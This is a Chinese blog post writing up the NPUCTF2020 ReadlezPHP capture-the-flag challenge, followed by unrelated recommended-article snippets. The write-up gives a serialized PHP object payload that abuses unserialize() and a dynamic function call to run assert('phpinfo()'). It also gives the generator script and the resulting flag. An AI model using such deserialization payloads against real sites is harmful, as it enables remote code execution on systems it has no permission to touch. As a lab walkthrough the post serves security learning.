[NPUCTF2020]ReadlezPHP1

最新推荐文章于 2024-08-10 21:46:38 发布
最新推荐文章于 2024-08-10 21:46:38 发布
阅读量156 收藏 1
点赞数 3
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kw741951/article/details/141000051
版权

打开题目,看到信息

ctrl+u查看源代码

看到php代码,打开

代码审计看一下,进行代码审计,发现存在反序列化语句:@$ppp = unserialize($_GET["data"]);和执行漏洞:echo $b($a);,此处未想到flag在phpinfo文件中,在网上才发现flag在phpinfo文件,因此构造序列化信息:O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";},所以payload为:time.php?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";},产生序列化得代码如下:  <?php
class HelloPhp
{
    public $a = "phpinfo()";
    public $b = "assert";
}
$c = new HelloPhp();
echo serialize($c);
?> 

输入payload:time.php?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}

得到flag

flag{07177462-27ed-48a1-97d2-92352653e408}
worker..
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[NPUCTF2020]Baby Obfuscation.exe.i64
06-02
Baby Obfuscation分析过程
解读“模块的沟通”
08-04
例如,如果模块A在时钟上升沿将信号Done设置为1,模块B不能立即在同一个时钟周期内检测到Done信号的变化,而是在下一个时钟周期才能看到Done信号为1。 下面通过一个具体的例子来进一步阐述这个问题: 假设我们有两...
flash涂鸦板
12-10
简单易操作 一木了然 而且能让你快速体验到FLASH的操作乐趣 让你有想去学的冲动 而且能让你快速掌握简单操作
obfuscation
05-11
obfuscation 基于Allatori的Java代码混淆工具 使用Allatori混淆工具写的一个Maven插件 mvn install此项目,然后在想要混淆的项目的pom文件中引入此插件,并指定配置文件全路径以及要混淆的类所在路径即可使用 ...
Android12修改设备名称
08-09 298
Android12 修改设备名称
Chromium编译指南2024 - Android篇:前置要求(一)
守城小轩的技术窝棚
08-09 477
通过本篇文章,我们详细介绍了在 Android 平台上编译 Chromium 所需的前置要求,包括系统和硬件要求。确保您的开发环境满足这些要求,是成功编译 Chromium 的关键步骤。我们讨论了使用 Ubuntu 24.04 LTS 操作系统、安装 Git 和 Python 等必要软件,以及配备足够的 RAM 和磁盘空间的重要性。同时,我们强调了稳定高速的网络条件对于下载和同步源代码的影响。
Android14音频进阶调试之命令播放mp3/aac非裸流音频(八十)
Android系统攻城狮
08-06 1123
本篇目的:Android14上,当我们没有app,又想测试mp3、aac、wav等音频时,这时候我们可以使用stagefright解码、播放音频文件。Stagefright 是 Android 系统中的一个多媒体框架,用于处理各种音频和视频文件格式。它提供了解析、解码、编码和播放多媒体内容的功能。Stagefright 框架包括多种组件和库,负责不同的多媒体处理任务。通过 Stagefright,Android 设备能够高效地播放和处理多媒体内容。
mysql注入-sqli-labs-master复现
小白
08-05 937
查看数据库,在注入回显时,但应该注意以下的点,数据回显是有限制的他可能不会回显完全,如下显示,用limit显示我们需要的数据,后面还可以依靠group_concat和concat两个函数。查看源码,截取关键部分源码,在源码中可以看到,一条预编译的sql语句,而这条语句配合id传参,就是我们的注入点了,并且这是典型的字符型注入。后面的第二关,为数字型注入,与第一关没有大的区别,但是看源码变量id没有用引号,引起来,所以注入 时不用闭合。我们看第七关,会发现他与其他关有些不同,这关考的是文件的注入。
永久删除的Android 文件去哪了?在Android上恢复误删除的消息和照片方法?
qq_23996309的博客
08-06 1032
丢失重要消息和照片可能是一种令人沮丧的经历,尤其是在您没有备份的情况下。但别担心,在本教程中,我们将指导您完成在Android设备上恢复已删除消息和照片的步骤。无论您是不小心删除了它们还是由于软件问题而消失了,这些步骤都可以帮助您检索宝贵的数据。
php strtr其他语言实现
qq_39517116的博客
08-10 278
函数的原理是基于字符或字符串映射的高效替换机制。它可以同时进行多对一的替换操作,并且在处理大量替换时效率较高。其他语言中的replace,和replaceAll基本都是一个结束后,基于这一个继续替换。在这个模式下的工作原理。
Android13适配记录
那个男人,你快乐吗?
08-08 258
把原来的storage权限拆分成image、audio、video三个权限。如果仅仅是操作图片,视频、语音没有操作文件类的,可以使用Android内置的图片选择器。如果接入了Google广告,需要声明广告ID权限。配置后在设置内可以选择。
安卓中Fragment的生命周期
君子慎独,不欺暗室。卑以自牧,含章可贞。
08-06 497
销毁状态:Fragment总是依附于Activity而存在,因此当Activity被销毁时,与它相关联的Fragment就会进入销毁状态。停止状态:当一个Activity进入停止状态时,与它相关联的Fragment就会进入停止状态,或者通过调用FragmentTransaction的remove()、replace()方法将Fragment从Activity中移除,但在事务提交之前调用了addToBackStack()方法,这时的Fragment也会进入停止状态。
Android SurfaceFlinger——Fence流转状态(五十)
小旭的专栏
08-07 428
fence 本质上对应上内核中一个文件描述符 sync_file,sync_file 中有一个核心的 fence 结构体,用于预计释放的时间点。所有的 fence 都是以 sync_timeline 为基准进行递增的。sync_timeline 作为内核记录已经渲染屏幕多少个时间点,每一次通过 hwc_set 都会递增一个时间点,并且会尝试的唤醒关联在 sync_timeline 中 active_list 中 sync_pt 的 fence 的阻塞。
安卓App开发 篇二:Android UI和布局
生活在别处
08-09 69
Figma上的Android UI Kit设计的界面原型并不能直接自动转换为Jetpack Compose代码,因为Figma是一个设计工具,而Jetpack Compose是Android平台上的声明式UI框架,它们分别处于设计和开发的不同阶段。当你调用一个可组合函数时,它就被认为是组合的一部分,这意味着它的输出将被包含在当前的UI中。基于槽位(slot-based)的布局是一种灵活的布局方式,它允许你创建可复用的、可扩展的组件,这些组件可以预留出位置或“槽位”,供外部代码填充特定的内容。
Android13 关于SystemUI更新/Nav Bar add volume button&&other button
sinat_37429535的博客
08-09 436
Android13系统导航栏添加音量加减键按钮功能](https://blog.csdn.net/wzh048503/article/details/140020452)[Android导航栏音量调节](https://blog.csdn.net/qq_27636049/article/details/103632949)[NavigationBar详解](https://juejin.cn/post/7223216421199315000)//要变成减音量,keyCode="25",其余不变;
MTK Android12 关机界面全屏展示
十年饮冰,难凉热血
08-08 732
实现点击关机【重启一样的逻辑】,弹出一个界面的需求,实现方式:1)去掉关机、重启的dialog的 dismiss方法,mDialog.dismiss();【也可以不去,全屏界面会盖住】2)在关闭实现全屏界面,这里用全屏dialog 实现。
Android实时通信:WebSocket与WebRTC的应用与优化
最新发布
陆业聪
08-10 1050
在现代移动应用中,实时通信已经成为一项基础功能。无论是实时聊天、在线游戏,还是实时音视频通信,都需要依赖实时通信技术。本文将介绍两种在Android平台上实现实时通信的主流方法:WebSocket和WebRTC。
Cairo库移植到安卓记录
Tracker647的博客
08-06 614
Android Studio引入ndk编译的so库的故事,这个东西搞了两周以后,由于自己不熟悉Java和安卓开发,踩了不少坑,其中一周时间都是花在怎么用Android Studio上的。。。AS下的新版本Koala,结果网上资料全是旧版本,很多设置完全不同,遇了问题经常不知所措,后面不得已,换成了老一点的2021 dolphin版本,也学会了看安卓官网资料,逐渐才稳定下来。
Android.mk(TODO)
fanged的专栏
08-06 464
(TODO)
从以下代码中找到被藏起来的e,提示:在代码注释中。from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) e = # Hidden q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ''' 169169912654178 128509160179202 518818742414340 358553002064450
07-16
m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ``` 在修改后的代码中,我们将 `e` 的值设置为 65537。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值